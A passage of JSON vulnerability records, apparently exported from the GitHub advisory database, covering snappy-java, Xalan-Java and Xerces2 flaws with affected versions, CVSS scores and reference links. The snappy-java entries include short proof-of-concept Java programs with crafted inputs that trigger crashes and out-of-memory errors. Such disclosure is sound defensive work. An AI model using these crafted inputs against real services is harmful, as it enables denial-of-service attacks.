"1.1.9.1" ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.1.10.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-fjpj-2g6w-x25r/GHSA-fjpj-2g6w-x25r.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/xerial/snappy-java/security/advisories/GHSA-fjpj-2g6w-x25r" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34454" }, { "type": "WEB", "url": "https://github.com/xerial/snappy-java/commit/d0042551e4a3509a725038eb9b2ad1f683674d94" }, { "type": "PACKAGE", "url": "https://github.com/xerial/snappy-java" }, { "type": "WEB", "url": "https://github.com/xerial/snappy-java/blob/05c39b2ca9b5b7b39611529cc302d3d796329611/src/main/java/org/xerial/snappy/Snappy.java#L169" }, { "type": "WEB", "url": "https://github.com/xerial/snappy-java/blob/05c39b2ca9b5b7b39611529cc302d3d796329611/src/main/java/org/xerial/snappy/Snappy.java#L422" }, { "type": "WEB", "url": "https://github.com/xerial/snappy-java/blob/master/src/main/java/org/xerial/snappy/Snappy.java" } ], "database_specific": { "cwe_ids": [ "CWE-190" ], "github_reviewed": true, "github_reviewed_at": "2023-06-15T16:28:08Z", "nvd_published_at": "2023-06-15T17:15:09Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-pqr6-cmr2-h8hf", "published": "2023-06-15T16:13:20Z", "modified": "2024-02-16T08:00:57.023897Z", "aliases": [ "CVE-2023-34453" ], "related": [ "CGA-8pqj-995r-975g", "CVE-2023-34453" ], "summary": "snappy-java's Integer Overflow vulnerability in shuffle leads to DoS", "details": "## Summary\nDue to unchecked multiplications, an integer overflow may occur, causing a fatal error.\n## Impact\nDenial of Service\n## Description\nThe function [shuffle(int[] input)](https://github.com/xerial/snappy-java/blob/05c39b2ca9b5b7b39611529cc302d3d796329611/src/main/java/org/xerial/snappy/BitShuffle.java#L107) in the file [BitShuffle.java](https://github.com/xerial/snappy-java/blob/master/src/main/java/org/xerial/snappy/BitShuffle.java) receives an array of integers and applies a bit shuffle on it. It does so by multiplying the length by 4 and passing it to the natively compiled shuffle function.\n\n```java\npublic static byte[] shuffle(int[] input) throws IOException {\n byte[] output = new byte[input.length * 4];\n int numProcessed = impl.shuffle(input, 0, 4, input.length * 4, output, 0);\n assert(numProcessed == input.length * 4);\n return output;\n }\n\n```\n\nSince the length is not tested, the multiplication by four can cause an integer overflow and become a smaller value than the true size, or even zero or negative. In the case of a negative value, a “java.lang.NegativeArraySizeException” exception will raise, which can crash the program. In a case of a value that is zero or too small, the code that afterwards references the shuffled array will assume a bigger size of the array, which might cause exceptions such as “java.lang.ArrayIndexOutOfBoundsException”.\nThe same issue exists also when using the “shuffle” functions that receive a double, float, long and short, each using a different multiplier that may cause the same issue.\n\n## Steps To Reproduce\nCompile and run the following code:\n\n```java\npackage org.example;\nimport org.xerial.snappy.BitShuffle;\n\nimport java.io.*;\n\n\npublic class Main {\n\n public static void main(String[] args) throws IOException {\n int[] original = new int[0x40000000];\n byte[] shuffled = BitShuffle.shuffle(original);\n System.out.println(shuffled[0]);\n }\n}\n\n```\nThe program will crash, showing the following error (or similar):\n\n```\nException in thread \"main\" java.lang.ArrayIndexOutOfBoundsException: Index 0 out of bounds for length 0\n\tat org.example.Main.main(Main.java:12)\n\nProcess finished with exit code 1\n\n```\n\nAlternatively - compile and run the following code:\n\n```java\npackage org.example;\nimport org.xerial.snappy.BitShuffle;\n\nimport java.io.*;\n\n\npublic class Main {\n\n public static void main(String[] args) throws IOException {\n int[] original = new int[0x20000000];\n byte[] shuffled = BitShuffle.shuffle(original);\n }\n}\n\n```\nThe program will crash with the following error (or similar):\n\n```\nException in thread \"main\" java.lang.NegativeArraySizeException: -2147483648\n\tat org.xerial.snappy.BitShuffle.shuffle(BitShuffle.java:108)\n\tat org.example.Main.main(Main.java:11)\n```", "affected": [ { "package": { "name": "org.xerial.snappy:snappy-java", "ecosystem": "Maven", "purl": "pkg:maven/org.xerial.snappy/snappy-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.1.10.1" } ] } ], "versions": [ "1.0.1-rc1", "1.0.1-rc2", "1.0.1-rc3", "1.0.1-rc4", "1.0.3", "1.0.3-rc1", "1.0.3-rc2", "1.0.3-rc3", "1.0.3-rc4", "1.0.3.1", "1.0.3.2", "1.0.3.3", "1.0.4", "1.0.4.1", "1.0.5", "1.0.5-M1", "1.0.5-M2", "1.0.5-M3", "1.0.5-M4", "1.0.5.1", "1.0.5.2", "1.0.5.3", "1.0.5.4", "1.1.0", "1.1.0-M1", "1.1.0-M2", "1.1.0-M3", "1.1.0-M4", "1.1.0.1", "1.1.1", "1.1.1-M1", "1.1.1-M2", "1.1.1-M3", "1.1.1-M4", "1.1.1.1", "1.1.1.2", "1.1.1.3", "1.1.1.4", "1.1.1.5", "1.1.1.6", "1.1.1.7", "1.1.10.0", "1.1.2", "1.1.2-M1", "1.1.2-RC1", "1.1.2-RC2", "1.1.2-RC3", "1.1.2.1", "1.1.2.2", "1.1.2.3", "1.1.2.4", "1.1.2.5", "1.1.2.6", "1.1.3-M1", "1.1.3-M2", "1.1.4", "1.1.4-M1", "1.1.4-M2", "1.1.4-M3", "1.1.7", "1.1.7.1", "1.1.7.2", "1.1.7.3", "1.1.7.4", "1.1.7.5", "1.1.7.6", "1.1.7.7", "1.1.7.8", "1.1.8", "1.1.8.1", "1.1.8.2", "1.1.8.3", "1.1.8.4", "1.1.9.0", "1.1.9.1" ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.1.10.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-pqr6-cmr2-h8hf/GHSA-pqr6-cmr2-h8hf.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/xerial/snappy-java/security/advisories/GHSA-pqr6-cmr2-h8hf" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34453" }, { "type": "WEB", "url": "https://github.com/xerial/snappy-java/commit/820e2e074c58748b41dbd547f4edba9e108ad905" }, { "type": "PACKAGE", "url": "https://github.com/xerial/snappy-java" }, { "type": "WEB", "url": "https://github.com/xerial/snappy-java/blob/05c39b2ca9b5b7b39611529cc302d3d796329611/src/main/java/org/xerial/snappy/BitShuffle.java#L107" }, { "type": "WEB", "url": "https://github.com/xerial/snappy-java/blob/master/src/main/java/org/xerial/snappy/BitShuffle.java" } ], "database_specific": { "cwe_ids": [ "CWE-190" ], "github_reviewed": true, "github_reviewed_at": "2023-06-15T16:13:20Z", "nvd_published_at": "2023-06-15T17:15:09Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-qcwq-55hx-v3vh", "published": "2023-06-15T17:15:06Z", "modified": "2024-02-17T05:36:43.827976Z", "aliases": [ "CVE-2023-34455" ], "related": [ "CGA-644v-gq8j-xww8", "CVE-2023-34455" ], "summary": "snappy-java's unchecked chunk length leads to DoS", "details": "## Summary\nDue to use of an unchecked chunk length, an unrecoverable fatal error can occur.\n## Impact\nDenial of Service\n## Description\nThe code in the function [hasNextChunk](https://github.com/xerial/snappy-java/blob/05c39b2ca9b5b7b39611529cc302d3d796329611/src/main/java/org/xerial/snappy/SnappyInputStream.java#L388) in the file [SnappyInputStream.java](https://github.com/xerial/snappy-java/blob/master/src/main/java/org/xerial/snappy/SnappyInputStream.java) checks if a given stream has more chunks to read. It does that by attempting to read 4 bytes. If it wasn’t possible to read the 4 bytes, the function returns false. Otherwise, if 4 bytes were available, the code treats them as the length of the next chunk.\n\n\n\n```java\n int readBytes = readNext(header, 0, 4);\n if (readBytes \u003c 4) {\n return false;\n }\n\n int chunkSize = SnappyOutputStream.readInt(header, 0);\n if (chunkSize == SnappyCodec.MAGIC_HEADER_HEAD) {\n .........\n }\n\n // extend the compressed data buffer size\n if (compressed == null || chunkSize \u003e compressed.length) {\n compressed = new byte[chunkSize];\n }\n\n```\n\nIn the case that the “compressed” variable is null, a byte array is allocated with the size given by the input data. Since the code doesn’t test the legality of the “chunkSize” variable, it is possible to pass a negative number (such as 0xFFFFFFFF which is -1), which will cause the code to raise a “java.lang.NegativeArraySizeException” exception. A worse case would happen when passing a huge positive value (such as 0x7FFFFFFF), which would raise the fatal “java.lang.OutOfMemoryError” error.\n\n\n## Steps To Reproduce\nCompile and run the following code:\n\n```java\npackage org.example;\nimport org.xerial.snappy.SnappyInputStream;\n\nimport java.io.*;\n\npublic class Main {\n\n public static void main(String[] args) throws IOException {\n byte[] data = {-126, 'S', 'N', 'A', 'P', 'P', 'Y', 0, 0, 0, 0, 0, 0, 0, 0, 0,(byte) 0x7f, (byte) 0xff, (byte) 0xff, (byte) 0xff};\n SnappyInputStream in = new SnappyInputStream(new ByteArrayInputStream(data));\n byte[] out = new byte[50];\n try {\n in.read(out);\n }\n catch (Exception ignored) {\n\n }\n }\n}\n```\n\nThe program will crash with the following error (or similar), even though there is a catch clause, since “OutOfMemoryError” does not get caught by catching the “Exception” class:\n\n```\nException in thread \"main\" java.lang.OutOfMemoryError: Requested array size exceeds VM limit\n\tat org.xerial.snappy.SnappyInputStream.hasNextChunk(SnappyInputStream.java:422)\n\tat org.xerial.snappy.SnappyInputStream.read(SnappyInputStream.java:167)\n\tat java.base/java.io.InputStream.read(InputStream.java:217)\n\tat org.example.Main.main(Main.java:12)\n\n```\n\n\nAlternatively - compile and run the following code:\n\n```java\npackage org.example;\nimport org.xerial.snappy.SnappyInputStream;\n\nimport java.io.*;\n\npublic class Main {\n\n public static void main(String[] args) throws IOException {\n byte[] data = {-126, 'S', 'N', 'A', 'P', 'P', 'Y', 0, 0, 0, 0, 0, 0, 0, 0, 0,(byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff};\n SnappyInputStream in = new SnappyInputStream(new ByteArrayInputStream(data));\n byte[] out = new byte[50];\n in.read(out);\n }\n}\n```\n\nThe program will crash with the following error (or similar):\n\n```\nException in thread \"main\" java.lang.NegativeArraySizeException: -1\n\tat org.xerial.snappy.SnappyInputStream.hasNextChunk(SnappyInputStream.java:422)\n\tat org.xerial.snappy.SnappyInputStream.read(SnappyInputStream.java:167)\n\tat java.base/java.io.InputStream.read(InputStream.java:217)\n\tat org.example.Main.main(Main.java:12)\n\n```\n\n\nIt is important to note that these examples were written by using a flow that is generally used by developers, and can be seen for example in the Apache project “flume”: https://github.com/apache/flume/blob/f9dbb2de255d59e35e3668a5c6c66a268a055207/flume-ng-channels/flume-file-channel/src/main/java/org/apache/flume/channel/file/Serialization.java#L278. Since they used try-catch, the “NegativeArraySizeException” exception won’t harm their users, but the “OutOfMemoryError” error can.", "affected": [ { "package": { "name": "org.xerial.snappy:snappy-java", "ecosystem": "Maven", "purl": "pkg:maven/org.xerial.snappy/snappy-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.1.10.1" } ] } ], "versions": [ "1.0.1-rc1", "1.0.1-rc2", "1.0.1-rc3", "1.0.1-rc4", "1.0.3", "1.0.3-rc1", "1.0.3-rc2", "1.0.3-rc3", "1.0.3-rc4", "1.0.3.1", "1.0.3.2", "1.0.3.3", "1.0.4", "1.0.4.1", "1.0.5", "1.0.5-M1", "1.0.5-M2", "1.0.5-M3", "1.0.5-M4", "1.0.5.1", "1.0.5.2", "1.0.5.3", "1.0.5.4", "1.1.0", "1.1.0-M1", "1.1.0-M2", "1.1.0-M3", "1.1.0-M4", "1.1.0.1", "1.1.1", "1.1.1-M1", "1.1.1-M2", "1.1.1-M3", "1.1.1-M4", "1.1.1.1", "1.1.1.2", "1.1.1.3", "1.1.1.4", "1.1.1.5", "1.1.1.6", "1.1.1.7", "1.1.10.0", "1.1.2", "1.1.2-M1", "1.1.2-RC1", "1.1.2-RC2", "1.1.2-RC3", "1.1.2.1", "1.1.2.2", "1.1.2.3", "1.1.2.4", "1.1.2.5", "1.1.2.6", "1.1.3-M1", "1.1.3-M2", "1.1.4", "1.1.4-M1", "1.1.4-M2", "1.1.4-M3", "1.1.7", "1.1.7.1", "1.1.7.2", "1.1.7.3", "1.1.7.4", "1.1.7.5", "1.1.7.6", "1.1.7.7", "1.1.7.8", "1.1.8", "1.1.8.1", "1.1.8.2", "1.1.8.3", "1.1.8.4", "1.1.9.0", "1.1.9.1" ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.1.10.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-qcwq-55hx-v3vh/GHSA-qcwq-55hx-v3vh.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/xerial/snappy-java/security/advisories/GHSA-qcwq-55hx-v3vh" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34455" }, { "type": "WEB", "url": "https://github.com/xerial/snappy-java/commit/3bf67857fcf70d9eea56eed4af7c925671e8eaea" }, { "type": "PACKAGE", "url": "https://github.com/xerial/snappy-java" }, { "type": "WEB", "url": "https://github.com/xerial/snappy-java/blob/05c39b2ca9b5b7b39611529cc302d3d796329611/src/main/java/org/xerial/snappy/SnappyInputStream.java#L388" }, { "type": "WEB", "url": "https://github.com/xerial/snappy-java/blob/master/src/main/java/org/xerial/snappy/SnappyInputStream.java" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230818-0009" } ], "database_specific": { "cwe_ids": [ "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2023-06-15T17:15:06Z", "nvd_published_at": "2023-06-15T18:15:09Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9339-86wc-4qgf", "published": "2022-07-20T00:00:18Z", "modified": "2024-06-25T02:34:59.864497Z", "aliases": [ "CVE-2022-34169" ], "summary": "Apache Xalan Java XSLT library integer truncation issue when processing malicious XSLT stylesheets", "details": "The Apache Xalan Java XSLT library is vulnerable to an integer truncation issue when processing malicious XSLT stylesheets. This can be used to corrupt Java class files generated by the internal XSLTC compiler and execute arbitrary Java bytecode.\n\nA fix for this issue was published in September 2022 as part of an anticipated 2.7.3 release.", "affected": [ { "package": { "name": "xalan:xalan", "ecosystem": "Maven", "purl": "pkg:maven/xalan/xalan" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.7.3" } ] } ], "versions": [ "2.1.0", "2.3.1", "2.4.0", "2.4.1", "2.5.0", "2.5.1", "2.5.D1", "2.6.0", "2.7.0", "2.7.1", "2.7.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/07/GHSA-9339-86wc-4qgf/GHSA-9339-86wc-4qgf.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-34169" }, { "type": "WEB", "url": "https://xalan.apache.org" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5256" }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5192" }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5188" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240621-0006" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220729-0009" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202401-25" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YULPNO3PAWMEQQZV2C54I3H3ZOXFZUTB" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L3XPOTPPBZIPFBZHQE5E7OW6PDACUMCJ" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KO3DXNKZ4EU3UZBT6AAR4XRKCD73KLMO" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JN3EVGR7FD3ZLV5SBTJXUIDCMSK4QUE2" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I5OZNAZJ4YHLOKRRRZSWRT5OJ25E4XLM" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/H4YNJSJ64NPCNKFPNBYITNZU5H3L4D6L" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YULPNO3PAWMEQQZV2C54I3H3ZOXFZUTB" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/L3XPOTPPBZIPFBZHQE5E7OW6PDACUMCJ" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KO3DXNKZ4EU3UZBT6AAR4XRKCD73KLMO" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JN3EVGR7FD3ZLV5SBTJXUIDCMSK4QUE2" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I5OZNAZJ4YHLOKRRRZSWRT5OJ25E4XLM" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/H4YNJSJ64NPCNKFPNBYITNZU5H3L4D6L" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00024.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread/x3f7xv3p1g32qj2hlg8wd57pwcpld471" }, { "type": "WEB", "url": "https://lists.apache.org/thread/2qvl7r43wb4t8p9dd9om1bnkssk07sn8" }, { "type": "WEB", "url": "https://lists.apache.org/thread/12pxy4phsry6c34x2ol4fft6xlho4kyw" }, { "type": "WEB", "url": "https://gitbox.apache.org/repos/asf?p=xalan-java.git;a=commit;h=da3e0d06b467247643ce04e88d3346739d119f21" }, { "type": "WEB", "url": "https://gitbox.apache.org/repos/asf?p=xalan-java.git;a=commit;h=ab57211e5d2e97cbed06786f919fa9b749c83573" }, { "type": "WEB", "url": "https://gitbox.apache.org/repos/asf?p=xalan-java.git;a=commit;h=2e60d0a9a5b822c4abf9051857973b1c6babfe81" }, { "type": "PACKAGE", "url": "https://gitbox.apache.org/repos/asf?p=xalan-java.git" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/168186/Xalan-J-XSLTC-Integer-Truncation.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/07/19/5" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/07/19/6" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/07/20/2" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/07/20/3" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/10/18/2" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/11/04/8" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/11/07/2" } ], "database_specific": { "cwe_ids": [ "CWE-681" ], "github_reviewed": true, "github_reviewed_at": "2022-07-21T22:28:36Z", "nvd_published_at": "2022-07-19T18:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-rc2w-r4jq-7pfx", "published": "2022-05-13T01:05:38Z", "modified": "2025-04-13T23:37:05.402190Z", "aliases": [ "CVE-2014-0107" ], "summary": "Improper Authorization in Apache Xalan-Java", "details": "The TransformerFactory in Apache Xalan-Java before 2.7.2 does not properly restrict access to certain properties when FEATURE_SECURE_PROCESSING is enabled, which allows remote attackers to bypass expected restrictions and load arbitrary classes or access external resources via a crafted (1) xalan:content-header, (2) xalan:entities, (3) xslt:content-header, or (4) xslt:entities property, or a Java property that is bound to the XSLT 1.0 system-property function.", "affected": [ { "package": { "name": "xalan:xalan", "ecosystem": "Maven", "purl": "pkg:maven/xalan/xalan" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.7.2" } ] } ], "versions": [ "2.1.0", "2.3.1", "2.4.0", "2.4.1", "2.5.0", "2.5.1", "2.5.D1", "2.6.0", "2.7.0", "2.7.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-rc2w-r4jq-7pfx/GHSA-rc2w-r4jq-7pfx.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-0107" }, { "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/92023" }, { "type": "PACKAGE", "url": "https://github.com/apache/xalan-java" }, { "type": "WEB", "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05324755" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/XALANJ-2435" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0c00afcab8f238562e27b3ae7b8af1913c62bc60838fb8b34c19e26b@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2900489bc665a2e32d021bb21f6ce2cb8e6bb5973490eebb9a346bca@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/201604-02" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.tenable.com/security/tns-2018-15" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-0348.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1351.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-1888.html" }, { "type": "WEB", "url": "http://svn.apache.org/viewvc?view=revision\u0026revision=1581058" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674334" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676093" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677145" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680703" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681933" }, { "type": "WEB", "url": "http://www.debian.org/security/2014/dsa-2886" }, { "type": "WEB", "url": "http://www.ibm.com/support/docview.wss?uid=swg21677967" }, { "type": "WEB", "url": "http://www.ocert.org/advisories/ocert-2014-002.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html" } ], "database_specific": { "cwe_ids": [ "CWE-285" ], "github_reviewed": true, "github_reviewed_at": "2022-07-07T23:02:09Z", "nvd_published_at": "2014-04-15T23:13:00Z", "severity": "HIGH" } }, { "schema_version": "1.7.3", "id": "GHSA-334p-wv2m-w3vp", "published": "2020-06-15T18:51:30Z", "modified": "2024-12-02T05:40:14.119313Z", "aliases": [ "CVE-2009-2625" ], "summary": "Denial of service in Apache Xerces2", "details": "XMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework.", "affected": [ { "package": { "name": "xerces:xercesImpl", "ecosystem": "Maven", "purl": "pkg:maven/xerces/xercesImpl" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.10.0" } ] } ], "versions": [ "2.0.0", "2.0.2", "2.2.1", "2.3.0", "2.4.0", "2.5.0", "2.6.0", "2.6.1", "2.6.2", "2.6.2-jaxb-1.0.6", "2.7.1", "2.8.0", "2.8.1", "2.9.0", "2.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-334p-wv2m-w3vp/GHSA-334p-wv2m-w3vp.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-2625" }, { "type": "WEB", "url": "https://github.com/apache/xerces2-j/commit/0bdf77af1d4fd26ec2e630fb6d12e2dfa77bc12b" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=512921" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8520" }, { "type": "WEB", "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9356" }, { "type": "WEB", "url": "https://rhn.redhat.com/errata/RHSA-2009-1199.html" }, { "type": "WEB", "url": "https://rhn.redhat.com/errata/RHSA-2009-1200.html" }, { "type": "WEB", "url": "https://rhn.redhat.com/errata/RHSA-2009-1201.html" }, { "type": "WEB", "url": "https://rhn.redhat.com/errata/RHSA-2009-1636.html" }, { "type": "WEB", "url": "https://rhn.redhat.com/errata/RHSA-2009-1637.html" }, { "type": "WEB", "url": "https://rhn.redhat.com/errata/RHSA-2009-1649.html" }, { "type": "WEB", "url": "https://rhn.redhat.com/errata/RHSA-2009-1650.html" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-XERCES-32014" }, { "type": "WEB", "url": "https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00310.html" }, { "type": "WEB", "url": "https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00325.html" }, { "type": "WEB", "url": "http://lists.apple.com/archives/security-announce/2009/Sep/msg00000.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2009-10/msg00001.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2009-10/msg00004.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2009-11/msg00002.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2010-06/msg00001.html" }, { "type": "WEB", "url": "http://marc.info/?l=bugtraq\u0026m=125787273209737\u0026w=2" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2012-1232.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2012-1537.html" }, { "type": "WEB", "url": "http://secunia.com/advisories/36162" }, { "type": "WEB", "url": "http://secunia.com/advisories/36176" }, { "type": "WEB", "url": "http://secunia.com/advisories/36180" }, { "type": "WEB", "url": "http://secunia.com/advisories/36199" }, { "type": "WEB", "url": "http://secunia.com/advisories/37300" }, { "type": "WEB", "url": "http://secunia.com/advisories/37460" }, { "type": "WEB", "url": "http://secunia.com/advisories/37671" }, { "type": "WEB", "url": "http://secunia.com/advisories/37754" }, { "type": "WEB", "url": "http://secunia.com/advisories/38231" }, { "type": "WEB", "url": "http://secunia.com/advisories/38342" }, { "type": "WEB", "url": "http://secunia.com/advisories/43300" }, { "type": "WEB", "url": "http://secunia.com/advisories/50549" }, { "type": "WEB", "url": "http://slackware.com/security/viewer.php?l=slackware-security\u0026y=2011\u0026m=slackware-security.486026" }, { "type": "WEB", "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-21-125136-16-1" }, { "type": "WEB", "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-263489-1" }, { "type": "WEB", "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-272209-1" }, { "type": "WEB", "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-77-1021506.1-1" }, { "type": "WEB", "url": "http://svn.apache.org/viewvc/xerces/java/trunk/src/org/apache/xerces/impl/XMLScanner.java?r1=572055\u0026r2=787352\u0026pathrev=787353\u0026diff_format=h" }, { "type": "WEB", "url": "http://www.cert.fi/en/reports/2009/vulnerability2009085.html" }, { "type": "WEB", "url": "http://www.codenomicon.com/labs/xml" }, { "type": "WEB", "url": "http://www.debian.org/security/2010/dsa-1984" }, { "type": "WEB", "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2009:209" }, { "type": "WEB", "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2011:108" }, { "type": "WEB", "url": "http://www.networkworld.com/columnists/2009/080509-xml-flaw.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2009/09/06/1" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2009/10/22/9" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2009/10/23/6" }, { "type": "WEB", "url": 